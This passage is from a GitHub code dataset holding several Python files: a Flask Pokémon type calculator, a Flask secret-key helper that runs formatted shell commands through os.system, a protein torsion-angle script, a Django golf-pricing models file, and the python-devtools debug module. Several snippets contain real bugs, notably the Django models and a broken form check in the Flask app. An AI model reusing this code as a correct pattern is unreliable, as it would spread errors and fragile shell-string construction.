350, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 350, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 351, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 352, "usage_type": "attribute"}, {"api_name": "libs.transformations.rotationY", "line_number": 352, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 352, "usage_type": "name"}, {"api_name": "ship.linex", "line_number": 355, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 355, "usage_type": "attribute"}, {"api_name": "ship.liney", "line_number": 356, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 356, "usage_type": "attribute"}, {"api_name": "ship.linez", "line_number": 357, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 357, "usage_type": "attribute"}, {"api_name": "libs.transformations.lookAt", "line_number": 365, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 365, "usage_type": "name"}, {"api_name": "libs.transformations.matmul", "line_number": 372, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 372, "usage_type": "name"}, {"api_name": "libs.transformations.translate", "line_number": 373, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 373, "usage_type": "name"}, {"api_name": "libs.transformations.uniformScale", "line_number": 374, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 374, "usage_type": "name"}, {"api_name": "libs.transformations.identity", "line_number": 384, "usage_type": "call"}, {"api_name": "libs.transformations", "line_number": 384, "usage_type": "name"}, {"api_name": "ship.route", "line_number": 389, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 390, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 392, "usage_type": "attribute"}, {"api_name": "ship.route", "line_number": 393, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 395, "usage_type": "attribute"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 402, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 402, 
"usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 403, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 403, "usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 404, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 404, "usage_type": "name"}, {"api_name": "libs.scene_graph.drawSceneGraphNode", "line_number": 405, "usage_type": "call"}, {"api_name": "libs.scene_graph", "line_number": 405, "usage_type": "name"}, {"api_name": "pyglet.clock.schedule_interval", "line_number": 408, "usage_type": "call"}, {"api_name": "pyglet.clock", "line_number": 408, "usage_type": "attribute"}, {"api_name": "pyglet.app.run", "line_number": 409, "usage_type": "call"}, {"api_name": "pyglet.app", "line_number": 409, "usage_type": "attribute"}]}
+{"seq_id": "26706102884", "text": "import pandas as pd\nfrom flask import Flask, render_template, request, redirect, url_for, session\nfrom sqlalchemy import create_engine\nimport json\nimport os\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.urandom(12).hex()\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///pkmn.sqlite\")\n\ntype_df = pd.read_sql(\"SELECT * FROM typemult\", con = engine, index_col=\"type\")\n\ntype_list = list(type_df.index)\n\nname_df = pd.read_sql(\"SELECT name, type_1, type_2 FROM pkmn_name_type\", con = engine, index_col=\"name\")\nname_df.drop(\"Drop\", inplace=True)\n\n# core function for deciding what to attack with\ndef attack_with(type1, type2=None):\n\n #monotype \n if type2 == None:\n damage = type_df[type1]\n damage = damage[damage != 1].sort_values(ascending=False)\n damage = pd.DataFrame(damage).rename(columns={type1: \"Defense Multiplier\"})\n damage['Type'] = [hit_type.title() for hit_type in damage.index]\n damage = damage[['Type', 'Defense Multiplier']]\n return damage\n #dual type\n else:\n damage = type_df[type1] * type_df[type2]\n damage = damage[damage != 1].sort_values(ascending=False)\n damage = pd.DataFrame(damage, columns = [\"Defense Multiplier\"])\n damage['Type'] = [hit_type.title() for hit_type in damage.index]\n damage = damage[['Type', 'Defense Multiplier']]\n return damage\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/type\", methods = ['POST', 'GET'])\ndef type_input():\n if request.method == \"POST\":\n \n # try clearing out previous variables in the session\n try:\n session.pop('send')\n except:\n pass\n\n # look for the monotype indicator, return a single type answer\n if request.form.get == \"on\":\n type1 = request.form.get(\"type_1_input\")\n def_mult_table = attack_with(type1).to_html(index = False, classes=['table table-striped'])\n send = {\n \"type1\": type1,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # dual type answer\n else:\n type1 = request.form.get(\"type_1_input\")\n type2 = request.form.get(\"type_2_input\")\n\n # catch the error of people inputting the same type twice\n if type1 == type2:\n send = {\n \"error\": 'Same type input twice. 
Did you mean to check \"Monotype\"?',\n \"source\": \"/type\"\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"oops\"))\n else:\n def_mult_table = attack_with(type1, type2).to_html(index = False, classes=['table table-striped'])\n send = {\n \"type1\": type1,\n \"type2\": type2,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n else:\n return render_template(\"type.html\", type_list=type_list)\n\n\n\n@app.route(\"/name\", methods=[\"POST\", \"GET\"])\ndef name_input():\n try:\n if request.method == \"POST\":\n # try clearing out previous variables in the session\n try:\n session.pop('send')\n except:\n pass\n\n pkmn=request.form.get(\"poke_name\")\n \n # see if the pokemon is dual type\n if name_df.loc[pkmn][1]:\n type1=name_df.loc[pkmn][0]\n type2=name_df.loc[pkmn][1]\n def_mult_table = attack_with(type1, type2).to_html(index = False, classes=['table table-striped'])\n send = {\n \"pkmn\": pkmn,\n \"type1\": type1,\n \"type2\": type2,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # monotype\n else:\n type1=name_df.loc[pkmn][0]\n def_mult_table = attack_with(type1).to_html(index = False, classes=['table table-striped'])\n send = {\n \"pkmn\": pkmn,\n \"type1\": type1,\n \"def_mult\": def_mult_table\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"calc\"))\n # render base page with names as a list for autofill\n else:\n name_list = list(name_df.index)\n return render_template(\"name.html\", name_list = name_list)\n # catch the error of inputting a pokemon not in the list\n except:\n send = {\n \"error\": \"I don't know that Pokémon yet, sorry.\",\n \"source\": \"/name\"\n }\n session['send'] = json.dumps(send)\n return redirect(url_for(\"oops\"))\n\n@app.route(\"/oops\")\ndef oops():\n received = session['send']\n return render_template(\"oops.html\", received = json.loads(received))\n\n\n@app.route(\"/calc\")\ndef calc():\n received = session['send']\n return render_template(\"calc.html\", received=json.loads(received))\n\n#################################################\n# Running App\n#################################################\n\nif __name__ == \"__main__\":\n app.run()", "repo_name": "rgoldsberry/pokemon-types", "sub_path": "web_app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 64, "usage_type": "attribute"}, {"api_name": 
"flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 71, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 75, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 93, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 93, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 94, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 103, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 123, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 124, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 134, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 146, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 152, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 158, 
"usage_type": "call"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}]}
+{"seq_id": "9330214484", "text": "#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask\n\nfrom core.controllers.login import controller as login\n\n\ndef keymaker(omnibus, filename='secret_key'):\n pathname = os.path.join(omnibus.instance_path, filename)\n print(\"Pathname\", pathname)\n try:\n omnibus.config['SECRET_KEY'] = open(pathname, 'rb').read()\n except IOError:\n parent_directory = os.path.dirname(pathname)\n if not os.path.isdir(parent_directory):\n os.system('mkdir -p {0}'.format(parent_directory))\n os.system('head -c 24 /dev/urandom > {0}'.format(pathname))\n omnibus.config['SECRET_KEY'] = open(pathname, filename)\n\n\nomnibus = Flask(__name__)\n\nomnibus.register_blueprint(login)\n\nkeymaker(omnibus)\n", "repo_name": "MikeBloom914/amazon", "sub_path": "run/core/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 18, "usage_type": "call"}, {"api_name": "os.system", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 23, "usage_type": "call"}, {"api_name": "core.controllers.login.controller", "line_number": 25, "usage_type": "argument"}]}
+{"seq_id": "43354520868", "text": "import os\nimport argparse\nimport pathlib\nimport numpy as np\nfrom Bio.PDB import PDBParser\nfrom idpgan_ped.coords import calc_chain_dihedrals\n\n\nparser = argparse.ArgumentParser(\n description='Build a file with values of a C-alpha torsional angles'\n ' for disordered protein structures.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('-i', '--pdb_dp', type=str, required=True,\n help='Input directory with a set of AlphaFold structures.')\nparser.add_argument('-p', '--pred_fp', type=str, required=True,\n help='Output file from the alphafold_disorder.py script from the'\n ' AlphaFold-disorder GitHub repository. The script must have been'\n ' use on the directory specified using the -i argument of this'\n ' script.')\nparser.add_argument('-o', '--out_fp', type=str, required=True,\n help='Output file.')\nparser.add_argument('-t', '--idr_score_t', type=float, default=0.581,\n help='Threshold score for defining an IDR residue. Obtained from:'\n ' https://pubmed.ncbi.nlm.nih.gov/36210722/')\n\n# parser.add_argument('--foo', action='store_true')\nargs = parser.parse_args()\n\n\n# Amino acids.\naa_three_to_one_dict = {\n \"GLY\": \"G\", \"ALA\": \"A\", \"LEU\": \"L\", \"ILE\": \"I\", \"ARG\": \"R\", \"LYS\": \"K\",\n \"MET\": \"M\", \"CYS\": \"C\", \"TYR\": \"Y\", \"THR\": \"T\", \"PRO\": \"P\", \"SER\": \"S\",\n \"TRP\": \"W\", \"ASP\": \"D\", \"GLU\": \"E\", \"ASN\": \"N\", \"GLN\": \"Q\", \"PHE\": \"F\",\n \"HIS\": \"H\", \"VAL\": \"V\", \"UNK\": \"X\"\n}\n\naa_one_letter = tuple(\"QWERTYIPASDFGHKLCVNMX\")\n\n\n# Parse the output file of the 'alphafold_disorder.py' script.\nprint(f\"# Reading the output of AlphaFold-disorder at: {args.pred_fp}\")\nidr_data = {}\ntot_residues = 0\nwith open(args.pred_fp, \"r\") as i_fh:\n i_fh.readline() # Exclude the first line.\n for line in i_fh:\n fields = line.split()\n filename = fields[0]\n res_num = int(fields[1])\n idr_score = float(fields[7])\n tot_residues += 1\n # Found an residue predicted to be in a IDR.\n if idr_score < args.idr_score_t:\n continue\n if filename not in idr_data:\n idr_data[filename] = [(res_num, idr_score)]\n else:\n idr_data[filename].append((res_num, idr_score))\nprint(f\"- Found {len(idr_data)} models with IDR residues and\"\n f\" {sum([len(idr_data[k]) for k in idr_data])} IDR residues\"\n f\" (out of {tot_residues} total residues).\")\n\n\n# Collect statistics for each PDB file.\nprint(\"# Extracting torsion angle values from PDB files.\")\ntor_values = []\nfor k, filename in enumerate(sorted(idr_data.keys())):\n idr_residues = idr_data[filename]\n print(f\"* {filename} {k}/{len(idr_data)}\")\n\n pdb_fp = os.path.join(args.pdb_dp, filename + \".pdb\")\n structure = PDBParser(QUIET=True).get_structure(filename, pdb_fp)\n residues = list(structure.get_residues())\n print(f\"- n_idr_res={len(idr_residues)}, n_tot_res={len(residues)}\")\n\n xyz_ca = [res[\"CA\"].get_coord() for res in residues]\n xyz_ca = np.stack(xyz_ca)[None,...]\n tor_ca = calc_chain_dihedrals(xyz_ca)\n for idr_res_i in idr_residues:\n if idr_res_i[0] == 1: # The first residue of a chain can't be used.\n continue \n if idr_res_i[0] >= len(residues) - 1: # Last two residues can't be used.\n continue\n tor_id = idr_res_i[0]-2\n res_im1 = residues[idr_res_i[0]-1-1]\n res_i = residues[idr_res_i[0]-1]\n res_ip1 = residues[idr_res_i[0]-1+1]\n res_ip2 = residues[idr_res_i[0]-1+2]\n tor_values.append([\n # Torsion angle value.\n tor_ca[0, tor_id],\n # Amino acid type indices.\n 
aa_one_letter.index(aa_three_to_one_dict[res_im1.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_i.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_ip1.get_resname()]),\n aa_one_letter.index(aa_three_to_one_dict[res_ip2.get_resname()])\n ])\n\ntor_values = np.array(tor_values)\nprint(f\"\\n# Collected {tor_values.shape[0]} torsion angle values.\")\nprint(f\"- Saving values at {args.out_fp}.\")\nnp.save(args.out_fp, tor_values)", "repo_name": "feiglab/idpgan_ped", "sub_path": "scripts/torsion_potential/torsion_potential_stats.py", "file_name": "torsion_potential_stats.py", "file_ext": "py", "file_size_in_byte": 4133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Bio.PDB.PDBParser", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 78, "usage_type": "call"}, {"api_name": "idpgan_ped.coords.calc_chain_dihedrals", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 103, "usage_type": "call"}]}
+{"seq_id": "23937105660", "text": "from django.db import models\nimport datetime\n# Create your models here.\n\nNINE = 9\nEIGHTEEN = 18\nMINOR = 5\nADULT = 8\nSENIOR = 7\nCARTP = 15\nGOLF_BALLS = 2\nCLUBS = 7\n\nclass golfer(models.Model):\n\n fname = models.CharField(max_length= 10)\n lname = models.CharField(max_length= 15)\n phone = models.CharField(max_length= 13)\n age = models.IntegerField(max_length= 3)\n\n def __str__ (self):\n return \"( \" + self.fname + \" \" + self.lname + \" )\" + self.phone + \", \" + self.age\n\nclass options(models.Model):\n\n occurance = models.ForeignKey(round, on_delete=models.CASCADE)\n phone = models.ForeignKey(round, on_delete=models.CASCADE)\n cart = models.IntegerField(maximum = 2, default = 0)\n golf_balls = models.IntegerField(default=0)\n club_rentals = models.IntegerField(default=0)\n \n\n \nclass round(models.Model):\n\n occurance = models.DateTimeField(default = datetime.datetime.now)\n phone = models.ForeignKey(golfer, on_delete=models.CASCADE)\n holes = models.IntegerField(max_length= 2, \n choices=[NINE, EIGHTEEN], default = 9)\n mem = models.IntegerField(default = None)\n price = models.FloatField(default = 0.0)\n \n def cal_price(self):\n curr = 0.0\n\n if(self.holes == NINE):\n if self.golfer.age < 18:\n curr += 5\n elif self.golfer.age > 18 & self.golfer.age < 65:\n curr += 8\n elif self.golfer.age > 65:\n curr += 7\n\n if self.round.mem < 18:\n curr += 5\n elif self.round.mem > 18 & self.round.mem < 65:\n curr += 8\n elif self.round.mem > 65:\n curr += 7\n\n elif self.round.holes == 18:\n if self.golfer.age < 18:\n curr += 10\n elif self.golfer.age > 18 & self.golfer.age < 65:\n curr += 16\n elif self.golfer.age > 65:\n curr += 14\n\n if self.round.mem < 18:\n curr += 10\n elif self.round.mem > 18 & self.round.mem < 65:\n curr += 16\n elif self.round.mem > 65:\n curr += 14\n\n curr += self.golf_balls * GOLF_BALLS\n curr += self.cart * CARTP\n curr += self.club_rentals * CLUBS\n\n price = curr\n\n def __str__ (self):\n return \"( \" + self.occurance + \" \" + self.phone + \" )\" + self.holes + \", \" + self.mem1 + \", \" + self.mem2 + \", \" + self.mem3 + \", \"", "repo_name": "SethCol99/golf_data", "sub_path": "golf_app/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2347, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "django.db.models.Model", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": 
"django.db.models.CASCADE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.db.models.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.db.models.IntegerField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}]}
+{"seq_id": "36236751191", "text": "import os\nimport sys\n\nfrom .ansi import sformat\nfrom .prettier import PrettyFormat\nfrom .timer import Timer\nfrom .utils import env_bool, env_true, is_literal, use_highlight\n\n__all__ = 'Debug', 'debug'\nMYPY = False\nif MYPY:\n from types import FrameType\n from typing import Any, Generator, List, Optional, Union\n\npformat = PrettyFormat(\n indent_step=int(os.getenv('PY_DEVTOOLS_INDENT', 4)),\n simple_cutoff=int(os.getenv('PY_DEVTOOLS_SIMPLE_CUTOFF', 10)),\n width=int(os.getenv('PY_DEVTOOLS_WIDTH', 120)),\n yield_from_generators=env_true('PY_DEVTOOLS_YIELD_FROM_GEN', True),\n)\n# required for type hinting because I (stupidly) added methods called `str`\nStrType = str\n\n\nclass DebugArgument:\n __slots__ = 'value', 'name', 'extra'\n\n def __init__(self, value: 'Any', *, name: 'Optional[str]' = None, **extra: 'Any') -> None:\n self.value = value\n self.name = name\n self.extra = []\n try:\n length = len(value)\n except TypeError:\n pass\n else:\n self.extra.append(('len', length))\n self.extra += [(k, v) for k, v in extra.items() if v is not None]\n\n def str(self, highlight: bool = False) -> StrType:\n s = ''\n if self.name and not is_literal(self.name):\n s = f'{sformat(self.name, sformat.blue, apply=highlight)}: '\n\n suffix = sformat(\n f\" ({self.value.__class__.__name__}){''.join(f' {k}={v}' for k, v in self.extra)}\",\n sformat.dim,\n apply=highlight,\n )\n try:\n s += pformat(self.value, indent=4, highlight=highlight)\n except Exception as exc:\n v = sformat(f'!!! error pretty printing value: {exc!r}', sformat.yellow, apply=highlight)\n s += f'{self.value!r}{suffix}\\n {v}'\n else:\n s += suffix\n return s\n\n def __str__(self) -> StrType:\n return self.str()\n\n\nclass DebugOutput:\n \"\"\"\n Represents the output of a debug command.\n \"\"\"\n\n arg_class = DebugArgument\n __slots__ = 'filename', 'lineno', 'frame', 'arguments', 'warning'\n\n def __init__(\n self,\n *,\n filename: str,\n lineno: int,\n frame: str,\n arguments: 'List[DebugArgument]',\n warning: 'Union[None, str, bool]' = None,\n ) -> None:\n self.filename = filename\n self.lineno = lineno\n self.frame = frame\n self.arguments = arguments\n self.warning = warning\n\n def str(self, highlight: bool = False) -> StrType:\n if highlight:\n prefix = (\n f'{sformat(self.filename, sformat.magenta)}:{sformat(self.lineno, sformat.green)} '\n f'{sformat(self.frame, sformat.green, sformat.italic)}'\n )\n if self.warning:\n prefix += sformat(f' ({self.warning})', sformat.dim)\n else:\n prefix = f'{self.filename}:{self.lineno} {self.frame}'\n if self.warning:\n prefix += f' ({self.warning})'\n return f'{prefix}\\n ' + '\\n '.join(a.str(highlight) for a in self.arguments)\n\n def __str__(self) -> StrType:\n return self.str()\n\n def __repr__(self) -> StrType:\n arguments = ' '.join(str(a) for a in self.arguments)\n return f''\n\n\nclass Debug:\n output_class = DebugOutput\n\n def __init__(self, *, warnings: 'Optional[bool]' = None, highlight: 'Optional[bool]' = None):\n self._show_warnings = env_bool(warnings, 'PY_DEVTOOLS_WARNINGS', True)\n self._highlight = highlight\n\n def __call__(self, *args: 'Any', file_: 'Any' = None, flush_: bool = True, **kwargs: 'Any') -> 'Any':\n d_out = self._process(args, kwargs)\n s = d_out.str(use_highlight(self._highlight, file_))\n print(s, file=file_, flush=flush_)\n if kwargs:\n return (*args, kwargs)\n elif len(args) == 1:\n return args[0]\n else:\n return args\n\n def format(self, *args: 'Any', **kwargs: 'Any') -> DebugOutput:\n return 
self._process(args, kwargs)\n\n def breakpoint(self) -> None:\n import pdb\n\n pdb.Pdb(skip=['devtools.*']).set_trace()\n\n def timer(self, name: 'Optional[str]' = None, *, verbose: bool = True, file: 'Any' = None, dp: int = 3) -> Timer:\n return Timer(name=name, verbose=verbose, file=file, dp=dp)\n\n def _process(self, args: 'Any', kwargs: 'Any') -> DebugOutput:\n \"\"\"\n BEWARE: this must be called from a function exactly 2 levels below the top of the stack.\n \"\"\"\n # HELP: any errors other than ValueError from _getframe? If so please submit an issue\n try:\n call_frame: 'FrameType' = sys._getframe(2)\n except ValueError:\n # \"If [ValueError] is deeper than the call stack, ValueError is raised\"\n return self.output_class(\n filename='',\n lineno=0,\n frame='',\n arguments=list(self._args_inspection_failed(args, kwargs)),\n warning=self._show_warnings and 'error parsing code, call stack too shallow',\n )\n\n function = call_frame.f_code.co_name\n\n from pathlib import Path\n\n path = Path(call_frame.f_code.co_filename)\n if path.is_absolute():\n # make the path relative\n cwd = Path('.').resolve()\n try:\n path = path.relative_to(cwd)\n except ValueError:\n # happens if filename path is not within CWD\n pass\n\n lineno = call_frame.f_lineno\n warning = None\n\n import executing\n\n source = executing.Source.for_frame(call_frame)\n if not source.text:\n warning = 'no code context for debug call, code inspection impossible'\n arguments = list(self._args_inspection_failed(args, kwargs))\n else:\n ex = source.executing(call_frame)\n function = ex.code_qualname()\n if not ex.node:\n warning = 'executing failed to find the calling node'\n arguments = list(self._args_inspection_failed(args, kwargs))\n else:\n arguments = list(self._process_args(ex, args, kwargs))\n\n return self.output_class(\n filename=str(path),\n lineno=lineno,\n frame=function,\n arguments=arguments,\n warning=self._show_warnings and warning,\n )\n\n def _args_inspection_failed(self, args: 'Any', kwargs: 'Any') -> 'Generator[DebugArgument, None, None]':\n for arg in args:\n yield self.output_class.arg_class(arg)\n for name, value in kwargs.items():\n yield self.output_class.arg_class(value, name=name)\n\n def _process_args(self, ex: 'Any', args: 'Any', kwargs: 'Any') -> 'Generator[DebugArgument, None, None]':\n import ast\n\n func_ast = ex.node\n atok = ex.source.asttokens()\n for arg, ast_arg in zip(args, func_ast.args):\n if isinstance(ast_arg, ast.Name):\n yield self.output_class.arg_class(arg, name=ast_arg.id)\n else:\n name = ' '.join(map(str.strip, atok.get_text(ast_arg).splitlines()))\n yield self.output_class.arg_class(arg, name=name)\n\n kw_arg_names = {}\n for kw in func_ast.keywords:\n if isinstance(kw.value, ast.Name):\n kw_arg_names[kw.arg] = kw.value.id\n\n for name, value in kwargs.items():\n yield self.output_class.arg_class(value, name=name, variable=kw_arg_names.get(name))\n\n\ndebug = Debug()\n", "repo_name": "samuelcolvin/python-devtools", "sub_path": "devtools/debug.py", "file_name": "debug.py", "file_ext": "py", "file_size_in_byte": 7664, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 847, "dataset": "github-code", "pt": "32", "api": [{"api_name": "prettier.PrettyFormat", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.env_true", "line_number": 19, "usage_type": 
